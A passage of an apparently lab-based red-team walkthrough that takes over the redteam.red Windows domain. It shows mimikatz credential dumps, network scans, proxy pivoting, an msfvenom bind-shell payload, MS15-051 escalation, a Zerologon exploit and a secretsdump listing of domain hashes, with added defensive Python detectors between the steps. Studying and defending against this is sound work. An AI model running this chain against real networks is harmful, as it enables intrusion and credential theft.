   DNS Suffix Search List. . . . . . : redteam.red

Ethernet adapter 本地连接 2:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   Physical Address. . . . . . . . . : 00-0C-29-91-D2-55
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::7421:fef:3e08:acb8%16(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.20.7(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.20.1
   DHCPv6 IAID . . . . . . . . . . . : 352324649
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9
   DNS Servers . . . . . . . . . . . : 10.10.20.12
   NetBIOS over Tcpip. . . . . . . . : Enabled

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 00-0C-29-91-D2-4B
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::60d4:f2c1:70a7:195f%11(Preferred)
   IPv4 Address. . . . . . . . . . . : 10.10.10.7(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-16-A9-45-00-0C-29-55-52-E9
   DNS Servers . . . . . . . . . . . : 10.10.10.8
   NetBIOS over Tcpip. . . . . . . . : Enabled

Tunnel adapter isatap.{28CA7395-A741-4E5A-BC50-6AAB69E7B927}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes

Tunnel adapter isatap.{6A2D8ACA-7DC5-49AC-8DF3-95C9F384D974}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
   Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP Enabled. . . . . . . . . . . : No
   Autoconfiguration Enabled . . . . : Yes
```

The machine is in the redteam.red domain and has a second NIC with address 10.10.10.7, so there is a further 10.10.10.x internal network.
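Both footholds so far (WEBLOGIC with 172.20.4.30 and 10.10.20.12, WORK-7 with 10.10.20.7 and 10.10.10.7) were found by reading `ipconfig` by eye for a second NIC. A dual-homed host bridges two segments, which is exactly the pivot condition the autoroute step relies on, so defenders want the same check automated across an estate. The parser below is an added example, not code from the article, that reads `ipconfig /all` text collected from Windows hosts and flags the multi-homed ones. The sample input is constructed to mirror the WORK-7 output above.

```python
import ipaddress
import re

# Adapter section headers, e.g. "Ethernet adapter 本地连接 2:" or "Tunnel adapter isatap.{...}:"
ADAPTER_RE = re.compile(r"^(?P<kind>Ethernet|Tunnel|Wireless LAN|PPP) adapter (?P<name>.+):$")
# Indented "Key . . . . : value" lines; the dotted leader is consumed by [ .]*
FIELD_RE = re.compile(r"^\s+(?P<key>[A-Za-z][A-Za-z0-9 /-]*?)[ .]*:\s*(?P<val>.*)$")


def parse_ipconfig(text: str) -> dict:
    """Return host-level fields plus one record per adapter."""
    host = {"hostname": None, "dns_suffix": None, "adapters": []}
    current = None
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = ADAPTER_RE.match(line)
        if m:
            current = {"kind": m.group("kind"), "name": m.group("name"), "ipv4": None,
                       "mask": None, "gateway": None, "dns": [], "connected": True}
            host["adapters"].append(current)
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue
        key, val = f.group("key").strip(), f.group("val").strip()
        if current is None:  # global "Windows IP Configuration" block
            if key == "Host Name":
                host["hostname"] = val
            elif key == "Primary Dns Suffix":
                host["dns_suffix"] = val or None
            continue
        if key == "IPv4 Address":
            current["ipv4"] = val.split("(")[0].strip()  # drop "(Preferred)"
        elif key == "Subnet Mask":
            current["mask"] = val
        elif key == "Default Gateway":
            current["gateway"] = val or None
        elif key == "DNS Servers" and val:
            current["dns"].append(val)
        elif key == "Media State":
            current["connected"] = "disconnected" not in val.lower()
    return host


def networks(host: dict) -> set:
    """Distinct IPv4 networks the host sits on, as CIDR strings."""
    return {str(ipaddress.IPv4Interface(f"{a['ipv4']}/{a['mask']}").network)
            for a in host["adapters"] if a["ipv4"] and a["mask"]}


def is_multihomed(host: dict) -> bool:
    """True when the host bridges two or more networks (a potential pivot point)."""
    return len(networks(host)) >= 2


# Constructed sample mirroring the WORK-7 output above (same layout, same addresses).
SAMPLE_IPCONFIG = """
Windows IP Configuration

   Host Name . . . . . . . . . . . . : work-7
   Primary Dns Suffix  . . . . . . . : redteam.red
   Node Type . . . . . . . . . . . . : Hybrid

Ethernet adapter 本地连接 2:

   Connection-specific DNS Suffix  . :
   Physical Address. . . . . . . . . : 00-0C-29-91-D2-55
   IPv4 Address. . . . . . . . . . . : 10.10.20.7(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.20.1
   DNS Servers . . . . . . . . . . . : 10.10.20.12

Ethernet adapter 本地连接:

   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.10.7(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.10.10.1
   DNS Servers . . . . . . . . . . . : 10.10.10.8

Tunnel adapter isatap.{28CA7395-A741-4E5A-BC50-6AAB69E7B927}:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
"""

if __name__ == "__main__":
    h = parse_ipconfig(SAMPLE_IPCONFIG)
    print(h["hostname"], h["dns_suffix"], sorted(networks(h)), "multi-homed:", is_multihomed(h))
```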

Domain Information Gathering

Dump credentials with kiwi:

```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords

......
Authentication Id : 0 ; 143262 (00000000:00022f9e)
Session           : Interactive from 1
User Name         : saul
Domain            : REDTEAM
Logon Server      : OWA
Logon Time        : 2024/3/25 10:01:22
SID               : S-1-5-21-1359007890-1682372173-1631803504-1135
        msv :
         [00000003] Primary
         * Username : saul
         * Domain   : REDTEAM
         * LM       : e90127c07127ed12f4ebf668acca53e9
         * NTLM     : 518b98ad4178a53695dc997aa02d455c
         * SHA1     : 39aa99a9e2a53ffcbe1b9eb411e8176681d01c39
        tspkg :
         * Username : saul
         * Domain   : REDTEAM
         * Password : admin!@#45
        wdigest :
         * Username : saul
         * Domain   : REDTEAM
         * Password : admin!@#45
        kerberos :
         * Username : saul
         * Domain   : REDTEAM.RED
         * Password : admin!@#45
        ssp :
        credman :

......
```

This yields a domain user: REDTEAM\saul:admin!@#45

Upload nbtscan and scan 10.10.10.0/24:

```
meterpreter > upload /root/桌面/nbtscan.exe c:\\
[*] Uploading  : /root/桌面/nbtscan.exe -> c:\nbtscan.exe
[*] Completed  : /root/桌面/nbtscan.exe -> c:\nbtscan.exe
meterpreter > shell
Process 2876 created.
Channel 3 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>c:/nbtscan 10.10.10.0/24
c:/nbtscan 10.10.10.0/24
Doing NBT name scan for addresses from 10.10.10.0/24

IP address       NetBIOS Name     Server    User             MAC address
------------------------------------------------------------------------------
10.10.10.7       WORK-7           <server>  <unknown>        00-0c-29-91-d2-4b
10.10.10.8       OWA              <server>  <unknown>        00-0c-29-ba-97-51
10.10.10.18      SQLSERVER-2008   <server>  <unknown>        00-0c-29-85-c6-a0
```

There are two more hosts on this subnet: OWA at 10.10.10.8 and SQLSERVER-2008 at 10.10.10.18.

Query the domain time server; this identifies the domain controller as OWA (10.10.10.8).

```
C:\Windows\system32>net time /domain
net time /domain
Current time at \\owa.redteam.red is 2024/3/25 10:57:56

The command completed successfully.
```

Upload fscan and scan the internal subnet.

```
meterpreter > upload /root/桌面/fscan.exe c:\\
[*] Uploading  : /root/桌面/fscan.exe -> c:\fscan.exe
[*] Completed  : /root/桌面/fscan.exe -> c:\fscan.exe
meterpreter > shell
Process 2480 created.
Channel 5 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001

C:\Windows\system32>c:/fscan.exe -h 10.10.10.0/24
c:/fscan.exe -h 10.10.10.0/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.1
start infoscan
(icmp) Target 10.10.10.7      is alive
(icmp) Target 10.10.10.8      is alive
(icmp) Target 10.10.10.18     is alive
[*] Icmp alive hosts len is: 3
10.10.10.8:808 open
10.10.10.8:88 open
10.10.10.18:1433 open
10.10.10.18:445 open
10.10.10.8:445 open
10.10.10.8:139 open
10.10.10.7:445 open
10.10.10.18:139 open
10.10.10.8:443 open
10.10.10.7:139 open
10.10.10.18:135 open
10.10.10.8:135 open
10.10.10.7:135 open
10.10.10.18:80 open
10.10.10.8:80 open
10.10.10.8:8172 open
[*] alive ports len is: 16
start vulscan
[+] NetInfo:
[*]10.10.10.7
   [->]work-7
   [->]10.10.20.7
   [->]10.10.10.7
[+] NetInfo:
[*]10.10.10.18
   [->]sqlserver-2008
   [->]10.10.10.18
[+] NetInfo:
[*]10.10.10.8
   [->]owa
   [->]10.10.10.8
[+] 10.10.10.7  MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)
[*] 10.10.10.7           __MSBROWSE__\WORK-7            Windows 7 Ultimate 7601 Service Pack 1
[*] 10.10.10.8  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] 10.10.10.8     [+]DC REDTEAM\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle:http://10.10.10.8         code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] 10.10.10.18  (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] 10.10.10.18          REDTEAM\SQLSERVER-2008    Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle:https://10.10.10.8        code:200 len:689    title:IIS7
[*] WebTitle:https://10.10.10.8:8172   code:404 len:0      title:None
[*] WebTitle:http://10.10.10.18        code:200 len:689    title:IIS7
[+] mssql:10.10.10.18:1433:sa sa
已完成 16/16
[*] 扫描结束,耗时: 23.1823579s
```

Both OWA and SQLSERVER-2008 run Windows Server 2008, and the MSSQL service on SQLSERVER-2008 uses the weak credential sa:sa.
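From a defender's side, the useful output of a scan like the one above is a per-host remediation list rather than a target list. The following is an added example (not part of the write-up or of fscan) that parses the line shapes seen in the fscan 1.8.1 output above, namely the ICMP alive lines, the `ip:port open` lines, the `[+] ip VULN (os)` finding, the `[+]DC` role marker and the `[+] service:ip:port:user pass` weak-credential line, and orders the results with the domain controller first. The excerpt it runs on is a constructed subset of that output.

```python
"""Turn fscan host-discovery output into a per-host remediation list.

Added example, not the write-up's own code and not part of fscan. The
regular expressions below are written for the line formats visible in the
fscan 1.8.1 output above; other fscan plugins print other shapes.
"""
import ipaddress
import re
from collections import defaultdict

# Constructed subset of the fscan output shown above.
SAMPLE_FSCAN = r"""
(icmp) Target 10.10.10.7      is alive
(icmp) Target 10.10.10.8      is alive
(icmp) Target 10.10.10.18     is alive
[*] Icmp alive hosts len is: 3
10.10.10.8:88 open
10.10.10.18:1433 open
10.10.10.18:445 open
10.10.10.8:445 open
10.10.10.7:445 open
10.10.10.8:443 open
[+] 10.10.10.7  MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)
[*] 10.10.10.8     [+]DC REDTEAM\OWA               Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] WebTitle:http://10.10.10.8         code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[+] mssql:10.10.10.18:1433:sa sa
"""

IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
ALIVE_RE = re.compile(rf"^\(icmp\) Target {IP}\s+is alive$")
PORT_RE = re.compile(rf"^{IP}:(\d+) open$")
VULN_RE = re.compile(rf"^\[\+\] {IP}\s+(\S+)\s+\((.*)\)$")        # missing-patch finding
DC_RE = re.compile(rf"^\[\*\] {IP}\s+\[\+\]DC (\S+)")              # domain controller marker
CRED_RE = re.compile(rf"^\[\+\] (\w+):{IP}:(\d+):(\S+) (\S+)$")    # weak credential


def parse_fscan(text):
    """Return {ip: {"alive", "ports", "role", "findings"}} for every host mentioned."""
    hosts = defaultdict(lambda: {"alive": False, "ports": [], "role": None, "findings": []})
    for raw in text.splitlines():
        line = raw.strip()
        if (m := ALIVE_RE.match(line)):
            hosts[m[1]]["alive"] = True
        elif (m := PORT_RE.match(line)):
            hosts[m[1]]["ports"].append(int(m[2]))
        elif (m := VULN_RE.match(line)):
            hosts[m[1]]["findings"].append(f"missing patch {m[2]} ({m[3]})")
        elif (m := DC_RE.match(line)):
            hosts[m[1]]["role"] = "DC"
        elif (m := CRED_RE.match(line)):
            hosts[m[2]]["findings"].append(f"weak credential {m[4]}:{m[5]} on {m[1]}/{m[3]}")
    for info in hosts.values():
        info["ports"].sort()
    return dict(hosts)


def remediation_list(hosts):
    """Order hosts for fixing: domain controllers first, then by number of findings, then by IP."""
    ordered = sorted(
        hosts.items(),
        key=lambda kv: (kv[1]["role"] != "DC", -len(kv[1]["findings"]), ipaddress.IPv4Address(kv[0])),
    )
    return [(ip, info["role"], info["findings"]) for ip, info in ordered]


if __name__ == "__main__":
    for ip, role, findings in remediation_list(parse_fscan(SAMPLE_FSCAN)):
        print(ip, role or "member", findings)
```

The ordering deliberately puts the DC first even when it has no scanner finding: on this network it is the host whose compromise ends the engagement, so any exposure on it outranks a missing patch elsewhere.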

To reach the 10.10.10.x subnet, first add a route.

```
meterpreter > run post/multi/manage/autoroute

[*] Running module against WORK-7
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.10.10.0/255.255.255.0 from host's routing table.
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.10.10.0         255.255.255.0      Session 3
   10.10.20.0         255.255.255.0      Session 1
```

Because a SOCKS5 proxy was started earlier and the route to 10.10.10.x has now been added, hosts on the 10.10.10.x subnet are reachable through that proxy.

Configure proxychains4.

```
vim /etc/proxychains4.conf
# add at the very bottom
socks5 172.20.4.16 1080
```

Getting a session on SQLSERVER-2008 via xp_cmdshell

Use MDUT to test the connection to the MSSQL service on 10.10.10.18.

https://github.com/SafeGroceryStore/MDUT

proxychains4 java -jar Multiple.Database.Utilization.Tools-2.1.1-jar-with-dependencies.jar

The current user is nt authority\network service, which has limited privileges.

Check the system information.

Generate a bind-shell payload with msfvenom.

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=172.20.4.16 lport=7777 -f exe > 7777.exe

Upload 7777.exe to C:/Users/Public/.

Start the MSF handler.

```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 10.10.10.18
msf6 exploit(multi/handler) > set lport 7777
msf6 exploit(multi/handler) > run
```

At the same time, run 7777.exe through MDUT's command execution.

MSF receives a meterpreter session running as NT AUTHORITY\NETWORK SERVICE.

Privilege escalation with MS15-051

Background the current session and escalate privileges with MS15-051.

```
meterpreter > background
[*] Backgrounding session 4...
msf6 > use windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/local/ms15_051_client_copy_image) > set session 4
msf6 exploit(windows/local/ms15_051_client_copy_image) > set lport 8888
msf6 exploit(windows/local/ms15_051_client_copy_image) > set rhost 10.10.10.18
msf6 exploit(windows/local/ms15_051_client_copy_image) > set target 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > run
```

This yields a meterpreter session running as SYSTEM.

Dump credentials with kiwi.

```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > kiwi_cmd sekurlsa::logonpasswords

......

Authentication Id : 0 ; 324139 (00000000:0004f22b)
Session           : Interactive from 1
User Name         : sqlserver
Domain            : REDTEAM
Logon Server      : OWA
Logon Time        : 2024/3/24 12:56:33
SID               : S-1-5-21-1359007890-1682372173-1631803504-1126
        msv :
         [00000003] Primary
         * Username : sqlserver
         * Domain   : REDTEAM
         * NTLM     : 6a59bf65a4957ac67e5fb4e1c221939c
         * SHA1     : d2adadd7aefc533ef3b826c8969d013ff263483f
         [00010000] CredentialKeys
         * NTLM     : 6a59bf65a4957ac67e5fb4e1c221939c
         * SHA1     : d2adadd7aefc533ef3b826c8969d013ff263483f
        tspkg :
        wdigest :
         * Username : sqlserver
         * Domain   : REDTEAM
         * Password : Server12345
        kerberos :
         * Username : sqlserver
         * Domain   : REDTEAM.RED
         * Password : Server12345
        ssp :
        credman :

......
```

This recovers the domain user REDTEAM\sqlserver with the password Server12345.

Taking the domain controller with CVE-2020-1472 (Zerologon)

Run zerologon_tester.py through the proxy to check whether the DC is vulnerable to CVE-2020-1472.

```
proxychains4 python3 zerologon_tester.py owa 10.10.10.8
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6011  ...  OK

Success! DC can be fully compromised by a Zerologon attack.
```

Use the exploit to reset the DC machine account password.

```
proxychains4 python3 cve-2020-1472-exploit.py owa 10.10.10.8
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Performing authentication attempts...
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6011  ...  OK
====================================================================================================================================================================================================================================================================================
Target vulnerable, changing account password to empty string

Result: 0

Exploit complete!
```
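The reset performed here is not silent on the DC: setting the DC's own computer account password over an unauthenticated Netlogon channel produces Security event 4742 ("A computer account was changed") whose subject is ANONYMOUS LOGON and whose target account ends in `$`. The block below is an added example (not part of the write-up) of that detection logic run over a few constructed event records; the JSON field names mirror the Windows event fields but are an assumption of this example, as is the `DC_ACCOUNTS` inventory.

```python
"""Flag the machine-account reset that a Zerologon-style exploit leaves in the DC's Security log.

Added example, not the write-up's own code. Input records are constructed
samples in a simplified JSON shape (assumption: a log shipper has flattened
the EventData fields into one object per event).
"""
import json

# Constructed sample events. Event 1 is the computer rotating its own password
# (normal); event 2 is the shape of the reset shown above; events 3 and 4 are
# benign noise that the rule must not match.
SAMPLE_EVENTS_JSON = """
[
  {"EventID": 4742, "Computer": "owa.redteam.red",
   "SubjectUserName": "OWA$", "SubjectDomainName": "REDTEAM",
   "TargetUserName": "OWA$", "TargetDomainName": "REDTEAM",
   "TimeCreated": "2024-03-25T02:00:11"},
  {"EventID": 4742, "Computer": "owa.redteam.red",
   "SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
   "TargetUserName": "OWA$", "TargetDomainName": "REDTEAM",
   "TimeCreated": "2024-03-25T11:02:37"},
  {"EventID": 4742, "Computer": "owa.redteam.red",
   "SubjectUserName": "administrator", "SubjectDomainName": "REDTEAM",
   "TargetUserName": "WORK-7$", "TargetDomainName": "REDTEAM",
   "TimeCreated": "2024-03-25T11:30:00"},
  {"EventID": 4624, "Computer": "owa.redteam.red",
   "SubjectUserName": "ANONYMOUS LOGON", "SubjectDomainName": "NT AUTHORITY",
   "TargetUserName": "OWA$", "TargetDomainName": "REDTEAM",
   "TimeCreated": "2024-03-25T11:02:36"}
]
"""

# Assumption: inventory of domain controller computer accounts for this lab.
DC_ACCOUNTS = {"OWA$"}


def load_events(raw):
    return json.loads(raw)


def is_anonymous_machine_reset(event):
    """True for a 4742 where an unauthenticated subject changed a computer ($) account."""
    if event.get("EventID") != 4742:
        return False
    subject = event.get("SubjectUserName", "").upper()
    target = event.get("TargetUserName", "")
    return subject == "ANONYMOUS LOGON" and target.endswith("$")


def severity(event):
    """A DC's own account being reset hands over the domain; anything else is still high."""
    return "critical" if event.get("TargetUserName") in DC_ACCOUNTS else "high"


def find_zerologon_resets(events):
    hits = []
    for ev in events:
        if is_anonymous_machine_reset(ev):
            hits.append({
                "time": ev["TimeCreated"],
                "dc": ev["Computer"],
                "account": ev["TargetUserName"],
                "severity": severity(ev),
            })
    return hits


if __name__ == "__main__":
    for hit in find_zerologon_resets(load_events(SAMPLE_EVENTS_JSON)):
        print(f"{hit['time']} {hit['severity'].upper()}: {hit['account']} "
              f"reset by ANONYMOUS LOGON on {hit['dc']}")
```

On a DC that has the August 2020 Netlogon update applied and enforcement mode enabled, the same connection attempt is refused instead, and the refusal is recorded as Netlogon events 5827/5828 in the System log; the 4742 rule above is the signal for a DC that was still exploitable.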

Use secretsdump.py from impacket to dump the credentials of every domain user.

```
proxychains4 python3 secretsdump.py redteam.red/owa\$@10.10.10.8 -no-pass
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.11.0 - Copyright 2023 Fortra

[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:445  ...  OK
[*] Target system bootKey: 0x4b30f6b8ed622d5a2ef12930e01d238e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:1c486b8140b308841f22f170d1524268:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
REDTEAM\OWA$:aes256-cts-hmac-sha1-96:6d0410f99224b2cc6ab6948b0590d28bdd7659966f7fa36777fdc03d95f8c264
REDTEAM\OWA$:aes128-cts-hmac-sha1-96:bb2b7d6592aad185ae0f1f0264f51d11
REDTEAM\OWA$:des-cbc-md5:3425f4c1ad2f19e5
REDTEAM\OWA$:plain_password_hex:029ace5dc91c3c37874f1a968c50f58cde29d543bd28a7ff9b0f32af5d16cb3ede2c04090ec9177c5c9145d43d6ea81b0549b20c8325b8c488f6c0fb83fa12890ae029e539651e632224926a0a4ea8b187350042147c52d6b4ea7eb1139f1f2f8ed8a598442f1e14f7ed2df1b1364f7249a313aafb92884848b2b99d71f075059a649c81b965a5725e07970487607a61f7bd256462d8f6a34f7ab74f6b43dbc4f7631eced9cda9c237e060524dec813aa0ba8d265d1b21e421a1dd3216ac768e49440390b2bdbb256a754dcfce8d7e5309ee5ffc8951c45fdf334f427ffc3f73bd0c8b9734af242d43a9fd29a3818886
REDTEAM\OWA$:aad3b435b51404eeaad3b435b51404ee:cbc48b0b50c4cdd834e6498afd3c39e5:::
[*] DefaultPassword
(Unknown User):ROOT#123
[*] DPAPI_SYSTEM
dpapi_machinekey:0xd9d2844fee5220c64134c4dd6af1cef55ca83c32
dpapi_userkey:0x972935b9a0f29be77b88a5e9aafaab1068649a3a
[*] L$ASP.NETAutoGenKeys2.0.50727.5420
 0000   E3 1A 39 7D 76 DF A9 6E  B9 58 F9 0F BC 7D C5 60   ..9}v..n.X...}.`
 0010   BA BA E6 BD 15 DE 26 D9  26 81 04 86 C5 50 00 1A   ......&.&....P..
 0020   11 98 C0 BD 1E CE 1F 0E  CC A4 08 EF 5E 7A 42 F6   ............^zB.
 0030   BD 96 83 8A 75 85 FF F6  FC 33 F0 8B 4B A5 1A 11   ....u....3..K...
 0040   4B 68 BD 65 25 8E 23 69  20 E0 2A 88 3A 02 0D C4   Kh.e%.#i .*.:...
 0050   84 CF F5 E1 50 79 E6 04                            ....Py..
L$ASP.NETAutoGenKeys2.0.50727.5420:e31a397d76dfa96eb958f90fbc7dc560babae6bd15de26d926810486c550001a1198c0bd1ece1f0ecca408ef5e7a42f6bd96838a7585fff6fc33f08b4ba51a114b68bd65258e236920e02a883a020dc484cff5e15079e604
[*] NL$KM
 0000   C2 09 A6 FB 68 5E 76 E3  CA CF 0D 64 C3 3F 97 15   ....h^v....d.?..
 0010   57 BF 0B 8A 2C 5E 84 D6  CC 42 EC DF E3 7A F9 9B   W...,^...B...z..
 0020   AE 8A D4 88 7F B1 DF D7  42 CD DB CE 07 57 3C 4C   ........B....W<L
 0030   10 E0 0A F9 C8 C7 7F 25  39 6B DC 3D 6D 3E 9D 7F   .......%9k.=m>..
NL$KM:c209a6fb685e76e3cacf0d64c33f971557bf0b8a2c5e84d6cc42ecdfe37af99bae8ad4887fb1dfd742cddbce07573c4c10e00af9c8c77f25396bdc3d6d3e9d7f
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:135  ...  OK
[proxychains] Dynamic chain  ...  172.20.4.16:1080  ...  10.10.10.8:6008  ...  OK
redteam.red\Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a67f14d5cc4fa22618c8b609e832db6:::
redteam.red\SM_4c09f7e38ef84c22b:1120:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
redteam.red\SM_dfb6b69905864ca19:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
redteam.red\SM_958e768f5a2e4c9fb:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
redteam.red\SM_645db7f160894c7fb:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
redteam.red\mail:1125:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::
redteam.red\sqlserver:1126:aad3b435b51404eeaad3b435b51404ee:6a59bf65a4957ac67e5fb4e1c221939c:::
redteam.red\saulgoodman:1128:aad3b435b51404eeaad3b435b51404ee:c0e1f147edf7462134f07e389c5466e2:::
redteam.red\gu:1129:aad3b435b51404eeaad3b435b51404ee:82a28aff9a3be5385b87c4928b54a66f:::
redteam.red\apt404:1130:aad3b435b51404eeaad3b435b51404ee:ba0b26eb2595bc0a639d986537433e5d:::
redteam.red\adduser:1131:aad3b435b51404eeaad3b435b51404ee:168df3659b5f75ab35645606839e5677:::
redteam.red\saul:1135:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::
OWA$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SQLSERVER-2008$:1127:aad3b435b51404eeaad3b435b51404ee:2dae08cafb67b4537b7d5871084c961d:::
WORK-7$:1138:aad3b435b51404eeaad3b435b51404ee:f085f13639b3de3c78de926c0719d36d:::
[*] Kerberos keys grabbed
redteam.red\Administrator:aes256-cts-hmac-sha1-96:7b784eb6783613652dff21340a86f80f8ef482c32e3198e7bbc03c2f4b46cc35
redteam.red\Administrator:aes128-cts-hmac-sha1-96:6e5b9a2228738bb07d101196f45bacd3
redteam.red\Administrator:des-cbc-md5:b3b35bb389542fae
redteam.red\Administrator:rc4_hmac:ccef208c6485269c20db2cad21734fe7
krbtgt:aes256-cts-hmac-sha1-96:67075a54cf9106904392e010bcd3caec5cc3d57d3c65b42065482ae53910ddbd
krbtgt:aes128-cts-hmac-sha1-96:0513db3ca29c78c0dff2295e5ac0388c
krbtgt:des-cbc-md5:f2fee9b529703e67
krbtgt:rc4_hmac:4a67f14d5cc4fa22618c8b609e832db6
redteam.red\mail:aes256-cts-hmac-sha1-96:67e9681e2ac218777ce23d469f4ca87c5288c5931251d1856007e65e9bf7d2b5
redteam.red\mail:aes128-cts-hmac-sha1-96:94e286bf0ab9d1980af2707aca2f1a47
